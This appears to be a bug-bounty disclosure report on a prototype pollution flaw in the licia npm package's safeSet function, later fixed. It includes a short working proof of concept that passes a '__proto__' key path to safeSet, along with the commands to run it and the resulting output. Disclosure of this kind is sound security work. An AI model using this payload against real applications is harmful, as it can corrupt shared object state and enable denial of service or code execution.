Prototype Pollution in liriliri/licia


Reported on

Sep 1st 2021

✍️ Description

licia package is vulnerable to Prototype Pollution. The safeSet function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var licia = require("licia")
let obj = {}
console.log("Before: " + {}.polluted)
licia.safeSet(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i licia # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

We have contacted a member of the liriliri/licia team and are waiting to hear back 3 months ago
ready-research submitted a
3 months ago
RedHoodSu confirmed that a fix has been merged on 10006a 2 months ago
RedHoodSu has been awarded the fix bounty